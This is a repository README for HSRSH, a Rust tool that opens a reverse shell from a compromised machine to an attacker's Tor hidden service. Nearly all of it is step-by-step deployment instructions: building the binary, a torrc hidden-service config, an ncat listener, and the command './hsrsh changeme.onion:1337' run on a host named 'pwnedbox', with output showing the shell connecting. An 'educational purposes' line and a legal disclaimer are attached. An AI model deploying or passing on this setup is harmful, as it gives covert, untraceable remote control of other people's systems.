Reverse shell over a Tor hidden service
Go to file
dustyfresh 3724c2d6e2 for the homies 2020-09-07 13:01:45 -05:00
src for the homies 2020-09-07 13:01:45 -05:00
.gitignore for the homies 2020-09-07 13:01:45 -05:00
Cargo.lock for the homies 2020-09-07 13:01:45 -05:00
Cargo.toml for the homies 2020-09-07 13:01:45 -05:00
LICENSE.txt for the homies 2020-09-07 13:01:45 -05:00 for the homies 2020-09-07 13:01:45 -05:00


Hidden Service Reverse Shell, aka HSRSH

This was a quickly written tool for demonstrating a reverse shell over a hidden service all in one binary and an excuse to play with Rust. Solely for educational purposes.


$ git clone

$ cd hsrsh

$ cargo build --release

# Release binary is ./target/release/hsrsh
  1. Configure your hidden service server you will be accepting the shell connection on. Make sure netcat is installed, and add this to your torrc, and then start tor
  HiddenServiceDir /var/lib/tor/hidden_service/
  HiddenServicePort 1337

Once Tor is bootstrapped you can get the onion address from the hidden service directory

$ cat /var/lib/tor/hidden_service/hostname
  1. Start listener on the hidden service using ncat. MAKE SURE TO ONLY ALLOW LOCALHOST CONNECTIONS
  user@localhost:~$ ncat --allow -nvlp 1337
  Ncat: Listening on
  1. Execute reverse shell binary, it will create a local tor instance and connect to your listener. This takes about 15 seconds.

    user@pwnedbox:~$ ./hsrsh
    	./hsrsh changeme.onion:1337
    user@pwnedbox:~$ ./hsrsh changeme.onion:1337
  2. If everything is setup properly your shell should connect after about 20 seconds or so assuming the tor and internet connection is stable.

  user@localhost:~$ ncat --allow -nvlp 1337
  Ncat: Version 7.60 ( )
  Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
  Ncat: Listening on :::1337
  Ncat: Listening on
  Ncat: Connection from
  Ncat: Connection from
  user@pwnedbox:~$ uptime
   13:37:02 up 16 days, 46 min,  1 user,  load average: 0.82, 0.93, 1.43

To do:

  • support tls
  • windows support
  • Better / more Rust-like error handling

Things that I read that helped me out a lot with this:


This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License v3.0 for more details at

Usage of hsrsh for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.